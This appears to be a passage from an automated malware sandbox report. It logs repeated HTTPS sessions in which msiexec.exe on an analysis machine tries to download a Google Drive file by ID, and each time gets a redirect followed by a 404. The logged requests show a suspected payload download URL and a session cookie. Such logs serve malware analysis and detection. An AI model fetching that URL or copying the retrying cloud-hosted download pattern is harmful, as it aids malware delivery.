                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          61192.168.2.650047216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:18:10 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:10 UTC1844INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgRKQI1gHZww9tOnRB3r-PrLvWT6oBYTMdnSMY8WS_nTKlFBwt9yenQV5uF333fMoj5U
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:10 GMT
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-JByc6npfKrjFrqPNkmGkgA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:18:10 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 48 2d 56 69 4b 61 69 48 31 4e 66 61 64 6e 4e 4f 5a 56 51 47 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HH-ViKaiH1NfadnNOZVQGg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          62192.168.2.650048142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:18:11 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:12 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:11 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-hdGb3ueDWb7gh_GqXW-FNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          63192.168.2.650049216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:18:12 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:13 UTC1851INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFiumC4nwiQg0mgxCb2_QNLYqvE1EorTlzaZVeV_WDT0vUNn2zb5wixMuhmGt6vO3-uMrlizZsl8wiw
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:13 GMT
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Security-Policy: script-src 'nonce-97HF-wuI94U9lwlxYgQkCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:18:13 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 58 73 6f 54 65 31 75 6e 77 4a 43 41 33 77 64 69 45 5a 69 6b 79 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="XsoTe1unwJCA3wdiEZikyQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          64192.168.2.650050142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:18:13 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:14 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:14 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: script-src 'nonce-5bKzymMAU5E2np-jvSaElQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          65192.168.2.650051216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:18:14 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:15 UTC1844INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFiumC6gl3_UA8eFSPWWCZAShlzvOg-YXSwJuLb61TZIpMvLC88Xz7s-eEiXMohPufwwccyD
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:15 GMT
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-T7ejV4F1ttm7NaobG-Uq4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:18:15 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 44 67 55 63 4d 61 4a 75 47 41 48 75 69 57 6d 74 33 46 48 30 4c 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="DgUcMaJuGAHuiWmt3FH0LA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          66192.168.2.650052142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:18:16 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:16 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:16 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-dfMkHgAnGDKrQ4OZ1hBoMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          67192.168.2.650053216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:18:17 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:17 UTC1851INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgS5m5j1zfyBJsDI6v8PjNT-XkB0niZTi_aplrudosYZ3DZX4iOBagDuFX6N1xgBXxuNJr8pPTY
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:17 GMT
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-yhm8-TR4BBaZ96TWzFDRQw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:18:17 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 32 36 73 6c 55 38 61 73 51 6f 65 6b 50 4d 50 30 53 4d 64 71 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
